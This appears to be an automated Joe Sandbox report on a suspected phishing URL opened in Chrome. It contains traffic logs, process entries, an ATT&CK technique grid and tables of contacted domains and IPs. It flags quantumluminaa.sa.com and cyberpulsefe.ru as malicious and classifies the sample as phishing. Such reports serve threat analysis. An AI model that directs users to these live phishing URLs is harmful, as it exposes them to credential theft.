    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
    Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
    Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
    Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
    Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
    Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
    Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
    Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
    Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49717 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49718 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.16:49719 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49720 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.159.64:443 -> 192.168.2.16:49721 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49722 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.16:49734 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.16:49767 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.16:49787 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.16:49802 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49898 version: TLS 1.2
    Source: classification engineClassification label: mal64.phis.win@19/65@134/625
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://decktop.us/MUYKd1
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1892,i,2975652863717743150,16727349667297580300,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1892,i,2975652863717743150,16727349667297580300,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Scripting
    1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Deobfuscate/Decode Files or Information
    Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://decktop.us/MUYKd10%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    decktop.us
    44.216.113.21
    truefalse
      unknown
      ws.gleap.io
      157.230.79.42
      truefalse
        unknown
        fastly-tls12-bam.nr-data.net
        162.247.243.29
        truefalse
          unknown
          tls13.taboola.map.fastly.net
          151.101.65.44
          truefalse
            unknown
            apiv21.decktopus.com
            34.231.150.201
            truefalse
              unknown
              quantumluminaa.sa.com
              104.21.5.163
              truefalse
                unknown
                us-assets.i.posthog.com
                172.67.40.50
                truefalse
                  unknown
                  events.launchdarkly.com
                  54.161.6.100
                  truefalse
                    unknown
                    stats.g.doubleclick.net
                    142.251.173.156
                    truefalse
                      unknown
                      cyberpulsefe.ru
                      188.114.96.3
                      truetrue
                        unknown
                        scontent.xx.fbcdn.net
                        157.240.253.1
                        truefalse
                          unknown
                          dualstack.tls13.taboola.map.fastly.net
                          151.101.129.44
                          truefalse
                            unknown
                            code.jquery.com
                            151.101.130.137
                            truefalse
                              unknown
                              cdnjs.cloudflare.com
                              104.17.24.14
                              truefalse
                                unknown
                                www.google.com
                                142.250.186.132
                                truefalse
                                  unknown
                                  sibautomation.com
                                  104.18.39.141
                                  truefalse
                                    unknown
                                    api.gleap.io
                                    67.207.79.245
                                    truefalse
                                      unknown
                                      star-mini.c10r.facebook.com
                                      157.240.251.35
                                      truefalse
                                        unknown
                                        a.nel.cloudflare.com
                                        35.190.80.1
                                        truefalse
                                          unknown
                                          clientstream-ga.launchdarkly.com
                                          13.248.151.210
                                          truefalse
                                            unknown
                                            js-agent.newrelic.com
                                            162.247.243.39
                                            truefalse
                                              unknown
                                              us-cds.taboola.com
                                              141.226.224.32
                                              truefalse
                                                unknown
                                                domains.rewardful.com
                                                161.35.235.194
                                                truefalse
                                                  unknown
                                                  app.decktopus.com
                                                  13.227.219.14
                                                  truefalse
                                                    unknown
                                                    analytics-alv.google.com
                                                    216.239.36.181
                                                    truefalse
                                                      unknown
                                                      in-automate.brevo.com
                                                      104.18.37.40
                                                      truefalse
                                                        unknown
                                                        googleads.g.doubleclick.net
                                                        173.194.219.154
                                                        truefalse
                                                          unknown
                                                          challenges.cloudflare.com
                                                          104.18.94.41
                                                          truefalse
                                                            unknown
                                                            posthog-ingress-prod-us-256455477.us-east-1.elb.amazonaws.com
                                                            18.214.35.203
                                                            truefalse
                                                              unknown
                                                              td.doubleclick.net
                                                              172.217.23.98
                                                              truefalse
                                                                unknown
                                                                cfv21.decktopus.com
                                                                13.224.189.108
                                                                truefalse
                                                                  unknown
                                                                  us.i.posthog.com
                                                                  unknown
                                                                  unknownfalse
                                                                    unknown
                                                                    psb.taboola.com
                                                                    unknown
                                                                    unknownfalse
                                                                      unknown
                                                                      affiliate.decktopus.com
                                                                      unknown
                                                                      unknownfalse
                                                                        unknown
                                                                        cds.taboola.com
                                                                        unknown
                                                                        unknownfalse
                                                                          unknown
                                                                          clientstream.launchdarkly.com
                                                                          unknown
                                                                          unknownfalse
                                                                            unknown
                                                                            www.facebook.com
                                                                            unknown
                                                                            unknownfalse
                                                                              unknown
                                                                              app.launchdarkly.com
                                                                              unknown
                                                                              unknownfalse
                                                                                unknown
                                                                                www.linkedin.com
                                                                                unknown
                                                                                unknownfalse
                                                                                  unknown
                                                                                  trc.taboola.com
                                                                                  unknown
                                                                                  unknownfalse
                                                                                    unknown
                                                                                    connect.facebook.net
                                                                                    unknown
                                                                                    unknownfalse
                                                                                      unknown
                                                                                      px.ads.linkedin.com
                                                                                      unknown
                                                                                      unknownfalse
                                                                                        unknown
                                                                                        bam.nr-data.net
                                                                                        unknown
                                                                                        unknownfalse
                                                                                          unknown
                                                                                          snap.licdn.com
                                                                                          unknown
                                                                                          unknownfalse
                                                                                            unknown
                                                                                            cdn.taboola.com
                                                                                            unknown
                                                                                            unknownfalse
                                                                                              unknown
                                                                                              analytics.google.com
                                                                                              unknown
                                                                                              unknownfalse
                                                                                                unknown
                                                                                                pips.taboola.com
                                                                                                unknown
                                                                                                unknownfalse
                                                                                                  unknown
                                                                                                  NameMaliciousAntivirus DetectionReputation
                                                                                                  https://quantumluminaa.sa.com/N2AB1/true
                                                                                                    unknown
                                                                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/yg2ds/0x4AAAAAAAh5rQ_2_FjCxZwY/auto/fbE/normal/auto/true
                                                                                                      unknown
                                                                                                      https://app.decktopus.com/share/MUYKd1/1false
                                                                                                        unknown
                                                                                                        https://app.decktopus.com/share/MUYKd1false
                                                                                                          unknown
                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs
                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          142.250.186.68
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          142.250.186.67
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          142.250.74.202
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          13.224.189.108
                                                                                                          cfv21.decktopus.comUnited States
                                                                                                          16509AMAZON-02USfalse
                                                                                                          173.194.219.154
                                                                                                          googleads.g.doubleclick.netUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          151.101.130.137
                                                                                                          code.jquery.comUnited States
                                                                                                          54113FASTLYUSfalse
                                                                                                          18.214.35.203
                                                                                                          posthog-ingress-prod-us-256455477.us-east-1.elb.amazonaws.comUnited States
                                                                                                          14618AMAZON-AESUSfalse
                                                                                                          35.190.80.1
                                                                                                          a.nel.cloudflare.comUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          142.251.173.156
                                                                                                          stats.g.doubleclick.netUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          44.216.113.21
                                                                                                          decktop.usUnited States
                                                                                                          14618AMAZON-AESUSfalse
                                                                                                          172.217.16.142
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          151.101.193.44
                                                                                                          unknownUnited States
                                                                                                          54113FASTLYUSfalse
                                                                                                          1.1.1.1
                                                                                                          unknownAustralia
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          13.248.151.210
                                                                                                          clientstream-ga.launchdarkly.comUnited States
                                                                                                          16509AMAZON-02USfalse
                                                                                                          157.240.0.35
                                                                                                          unknownUnited States
                                                                                                          32934FACEBOOKUSfalse
                                                                                                          104.18.95.41
                                                                                                          unknownUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          67.207.79.245
                                                                                                          api.gleap.ioUnited States
                                                                                                          14061DIGITALOCEAN-ASNUSfalse
                                                                                                          13.107.42.14
                                                                                                          unknownUnited States
                                                                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                          34.195.161.109
                                                                                                          unknownUnited States
                                                                                                          14618AMAZON-AESUSfalse
                                                                                                          239.255.255.250
                                                                                                          unknownReserved
                                                                                                          unknownunknownfalse
                                                                                                          188.114.97.3
                                                                                                          unknownEuropean Union
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          151.101.65.44
                                                                                                          tls13.taboola.map.fastly.netUnited States
                                                                                                          54113FASTLYUSfalse
                                                                                                          34.231.150.201
                                                                                                          apiv21.decktopus.comUnited States
                                                                                                          14618AMAZON-AESUSfalse
                                                                                                          18.239.36.4
                                                                                                          unknownUnited States
                                                                                                          16509AMAZON-02USfalse
                                                                                                          88.221.110.227
                                                                                                          unknownEuropean Union
                                                                                                          20940AKAMAI-ASN1EUfalse
                                                                                                          142.250.186.42
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          142.250.184.232
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          88.221.110.145
                                                                                                          unknownEuropean Union
                                                                                                          20940AKAMAI-ASN1EUfalse
                                                                                                          104.17.25.14
                                                                                                          unknownUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          143.204.98.26
                                                                                                          unknownUnited States
                                                                                                          16509AMAZON-02USfalse
                                                                                                          104.22.59.181
                                                                                                          unknownUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          142.250.186.130
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          104.18.94.41
                                                                                                          challenges.cloudflare.comUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          54.161.6.100
                                                                                                          events.launchdarkly.comUnited States
                                                                                                          14618AMAZON-AESUSfalse
                                                                                                          157.240.0.6
                                                                                                          unknownUnited States
                                                                                                          32934FACEBOOKUSfalse
                                                                                                          172.217.23.98
                                                                                                          td.doubleclick.netUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          151.101.194.217
                                                                                                          unknownUnited States
                                                                                                          54113FASTLYUSfalse
                                                                                                          104.18.39.141
                                                                                                          sibautomation.comUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          142.250.186.132
                                                                                                          www.google.comUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          161.35.235.194
                                                                                                          domains.rewardful.comUnited States
                                                                                                          14061DIGITALOCEAN-ASNUSfalse
                                                                                                          151.101.194.137
                                                                                                          unknownUnited States
                                                                                                          54113FASTLYUSfalse
                                                                                                          162.247.243.39
                                                                                                          js-agent.newrelic.comUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          104.17.24.14
                                                                                                          cdnjs.cloudflare.comUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          216.239.36.181
                                                                                                          analytics-alv.google.comUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          34.234.115.5
                                                                                                          unknownUnited States
                                                                                                          14618AMAZON-AESUSfalse
                                                                                                          157.230.79.42
                                                                                                          ws.gleap.ioUnited States
                                                                                                          14061DIGITALOCEAN-ASNUSfalse
                                                                                                          142.250.186.163
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          216.58.206.67
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          172.67.40.50
                                                                                                          us-assets.i.posthog.comUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          104.18.37.40
                                                                                                          in-automate.brevo.comUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          142.250.185.136
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          151.101.129.44
                                                                                                          dualstack.tls13.taboola.map.fastly.netUnited States
                                                                                                          54113FASTLYUSfalse
                                                                                                          151.101.2.217
                                                                                                          unknownUnited States
                                                                                                          54113FASTLYUSfalse
                                                                                                          142.250.185.174
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          157.240.253.1
                                                                                                          scontent.xx.fbcdn.netUnited States
                                                                                                          32934FACEBOOKUSfalse
                                                                                                          188.114.96.3
                                                                                                          cyberpulsefe.ruEuropean Union
                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                          162.247.243.29
                                                                                                          fastly-tls12-bam.nr-data.netUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          142.250.186.164
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          64.233.184.84
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          34.199.197.8
                                                                                                          unknownUnited States
                                                                                                          14618AMAZON-AESUSfalse
                                                                                                          141.226.224.32
                                                                                                          us-cds.taboola.comIsrael
                                                                                                          200478TABOOLA-ASILfalse
                                                                                                          104.21.5.163
                                                                                                          quantumluminaa.sa.comUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          157.240.251.35
                                                                                                          star-mini.c10r.facebook.comUnited States
                                                                                                          32934FACEBOOKUSfalse
                                                                                                          13.227.219.14
                                                                                                          app.decktopus.comUnited States
                                                                                                          16509AMAZON-02USfalse
                                                                                                          IP
                                                                                                          192.168.2.16
                                                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                                                          Analysis ID:1499125
                                                                                                          Start date and time:2024-08-26 16:47:54 +02:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                          Sample URL:https://decktop.us/MUYKd1
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:14
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • EGA enabled
